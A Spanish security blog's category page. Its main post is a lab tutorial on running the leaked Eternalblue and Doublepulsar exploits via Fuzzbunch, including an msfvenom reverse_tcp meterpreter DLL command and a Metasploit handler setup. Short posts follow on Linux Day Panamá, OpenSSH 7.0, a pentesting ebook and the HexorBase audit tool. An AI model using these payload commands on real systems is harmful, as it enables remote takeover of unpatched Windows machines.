Categoría : Kali Linux

Inicio/Archivo por Categoría Kali Linux

How to: explotando Eternalblue + Doublepulsar

Hace pocos días saltaba la noticia de que se el grupo Shadow Brokers había liberado una nueva hornada de exploits de la NSA. Por si esto fuera poco, en el github donde están los exploits también hay información sobre como atacar a los sistemas bancarios.

La gran mayoría de los exploits publicados hacen que comprometer un sistema Windows sea cosa de niños y casi como vemos en las películas, puesto que ente ellos se encuentran varios 0-day (ahora ya parcheados por Microsoft) que atacan al protocolo SMB en todas sus versiones.

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar. En este post vamos a explicar cómo desplegar un entorno de pruebas donde poder probar los exploits.

(Aclaración: Sobra decir que la información se proporciona a título informativo y didáctico, con objeto de colaborar a mejorar el conocimiento de los técnicos en ciberseguridad. Los cibercriminales no necesitan que nadie les enseñe cómo utilizar los exploits.).

Necesitaremos:

  1. Máquina Virtual Windows atacante.
  2. Maquina Vitrual Windows víctima.
  3. Equipo con Linux.

Una vez desplegadas las máquinas virtuales de Windows, el primer paso es preparar una de ellas como la atacante. En esta debemos satisfacer una serie de requisitos para poder utilizar el framework Fuzzbunch, que es desde donde lanzaremos los exploits. Para ello se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Se puede hacer con un “git clone” o descargando el repositorio directamente:

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

  1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
  2. PyWin32-221 para Python 2.6.6.
  3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Uso del Framework Fuzzbunch

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

  • Default Default target IP Addres [] : IP de la víctima.
  • Dafault Callback Addres [] : IP de nuestra máquina Windows.
  • Use redirection[yes] : Establecer a ‘no’.
  • Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>

Ilustración 1 Terminal del framework

Para visualizar qué exploits hay disponibles podemos teclear Show Exploits:

Ilustración 2 Exploits disponibles

Como se ha comentado anteriormente, en este post se va a explicar Eternalblue (auque no salga en la lista, está disponible) junto con Doublepulsar. Muy por encima, Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

Eternalblue

Para hacer uso de Eternalblue hay que teclear use Eternalblue y acto seguido introducir la información solicitada por pantalla:

Ilustración 3 Configurando Eternalblue

Si todo ha salido bien veremos el siguiente mensaje en el terminal:

Ilustración 4 Ejecución terminada con éxito

Doublepulsar

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:

msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll

Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

[..]

Volviendo a Doublepulsar, como en el proceso anterior hay que introducir la información que va apareciendo en el terminal:

Ilustración 5 Configuración Doublepulsar

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Ilustración 6 Sesión de meterpreter

Por último y no menos importante, una vez tengamos la conexión con el meterpreter deberemos volver a ejecutar Doublepulsar y seleccionar la opción:

4) Uninstall           Remove's backdoor from system

Para eliminar la backdoor, puesto que ya no la necesitamos.

Ilustración 7 Eliminación de la backdoor

Como se ha podido observar, resulta alarmante la facilidad con la que se consigue comprometer un sistema Windows haciendo uso de estos exploits.

En estos momentos creo que todo el mundo se estará preguntando: ¿si esto es lo que se ha publicado, que más cosas tendrán los chicos buenos de la NSA?

 

Visto en: SecurityatWork

Estaremos en el Linux Day Panamá – 06 de Agosto de 2016

Como muchos saben *Linux®* es un sistema operativo libre y de código abierto que comenzó como un pequeño proyecto por Linus Torvalds en 1991. En la actualidad se utiliza en todos los equipos que puedas imaginar, desde sistemas embebidos en los submarinos nucleares, también en los equipos de Wall Street, la Bolsa de Valores de Londres, El Gran Colisionador de Hadrones y los superordenadores de la NASA.

El Linux Day  es un día de celebración que organizan muchas comunidades a nivel mundial en agradecimiento a Linux.

Este año”Linux Day” celebra su 25 aniversario para el cual hemos tenido el placer de ser invitados con dos ponencias es este importante evento.

Alvaro Andrade participará con Linux e Informática Forense en los Delitos contra el Honor y la Privacidad de las personas

Cristhian Lima participará con “Accede al mundo del Ethical Hacking con Linux”

En Panamá se estará celebrando este evento el día 06 de Agosto del presente año en la Universidad Interamericana de Panamá.

Para asistir al evento solo tienes que registrarte online ya que es totalmente Gratuito. Puedes adquirir tus Tickets  Aquí

Se publica OpenSSH 7.0

OpenSSH es una variante abierta del protocolo SSH, que permite la conexión segura a equipos remotos, y llegó por primera vez al mundo *Nix en 1999, cuando fue implementado en OpenBSD 2.6. Desde entonces su adopción creció hasta el 100 por ciento puesto que todas las distros de Linux la implementan en la actualidad, aún cuando SSH liberó su código fuente luego del éxito de esta variante abierta.

Como herramienta de comunicación y de seguridad, es esencial mantenerla siempre actualizada y por eso es importante destacar que hace pocas horas se produjo la llegada de OpenSSH 7.0. Una versión que trae numerosas mejoras y actualizaciones de seguridad, a la vez que comienza a recorrer el camino hacia versiones futuras y próximas en las cuales algunos elementos irán cambiando y por ello se ofrece importante información al respecto.

Una de las cuestiones que se modifican respecto a versiones anteriores de OpenSSH es la de la opción PermitRootLogin, que ha sido cambiada de “yes” a “prohibit-password”, con lo cual únicamente podremos loguearnos como root si tenemos una clave SSH instalada en el servidor, eliminando el ingreso de contraseña por teclado y con ello aumentando muchísimo nuestra seguridad. Se ha eliminado el soporte para SSH versión 1, ya completamente obsoleto a estas alturas, y también sucede lo propio con el formato de certificados V00, que estaba hasta ahora por cuestiones de retrocompatibilidad.

Luego se mejora la compatibilidad para Portable OpenSSH y se corrigen varios bugs, y entre los cambios que se irán implementando en las próximas versiones podemos mencionar la eliminación de las claves RSA de menos de 1024 bits (cabe destacar que el mínimo actual es de 768 bits), y algunos cifrados que serán eliminados por defecto como es el caso de Blowfish-CBC, Cast128-CBC, Rijndael-CBC para AES y todas las variantes de ARCfour.

Fuente: Segu.Info

Ebook Gratuito – Packt Penetration Testing with BackBox

El libro que les traigo hoy, comienza con la introducción de BackBox (Una versión muy parecida a Kali Linux). Es útil en la comprensión de cómo se clasifican las herramientas y el significado de cada categoría que en este libro se ha explicado en palabras sencillas de forma que incluso un principiante podría entender fácilmente.

Todo el libro está estructurado de acuerdo con las metodologías y pasos de Pentesting actuales, partiendo desde el reconocimiento, evaluación de vulnerabilidades, etapa del ataque real,  mantener el acceso y la escalada de privilegios, hasta la presentación de informes y documentación. La estructura es muy fácil de seguir y constituye una información valiosa para los que son nuevos en temas de Pentesting.

Aunque el libro ofrece algunos ejemplos básicos con introducción de cada herramienta. Me gustaría que hubiera algunos ejemplos más, para complementar la misma. Una característica muy interesante de este libro, es que da un ejemplo completo paso a paso de la realización de una prueba de Pentesting.

Recomiendo este libro para todos los que quieran aprender sobre Pentesting y distribuciones live GNU/Linux.

Detalles del Libro:

Editorial: Packt
Por: Packt Publishing Ltd.
ISBN: 978-1-78328-297-5
Año: 2014
Paginas: 130
Idioma: Inglés
Tamaño: 3.58 MB
Formato: PDF

Hexorbase Excelente herramienta de auditoria y administración de múltiples bases de datos

HexorBase es una aplicación de base de datos diseñada para la administración y la auditoria de varios servidores de bases de datos de forma simultánea desde una ubicación centralizada, es capaz de realizar consultas SQL y ataques de fuerza bruta contra servidores de bases de datos (MySQL, SQLite, Microsoft SQL Server, Oracle y PostgreSQL).

Esta poderosa herramienta permite enrutamiento de paquetes a través de proxies e incluso permite pivotear a través de Metasploit para comunicarse con servidores de forma remota que están ocultos dentro de las subredes locales. Sin duda alguna una muy buena opción a la hora de realizar un Pentesting.

HexorBase01

HexorBase ya viene instalada en Kali Linux pero si deseas hacer tu propia instalación en el sistema operativo de tu preferencia, trabaja muy bien en Linux como en Windows bajo los siguientes requisitos:

  • python
  • python-qt4
  • cx_Oracle
  • python-mysqldb
  • python-psycopg2
  • python-pymssql
  • python-qscintilla2

Para instalarla solo hay que descargarse el .deb desde:

https://code.google.com/p/hexorbase/downloads/list

Y ejecutar:

root@host:~# dpkg -i hexorbase_1.0_all.deb

HexorBase03

Cualquier consulta pueden dejar sus comentarios.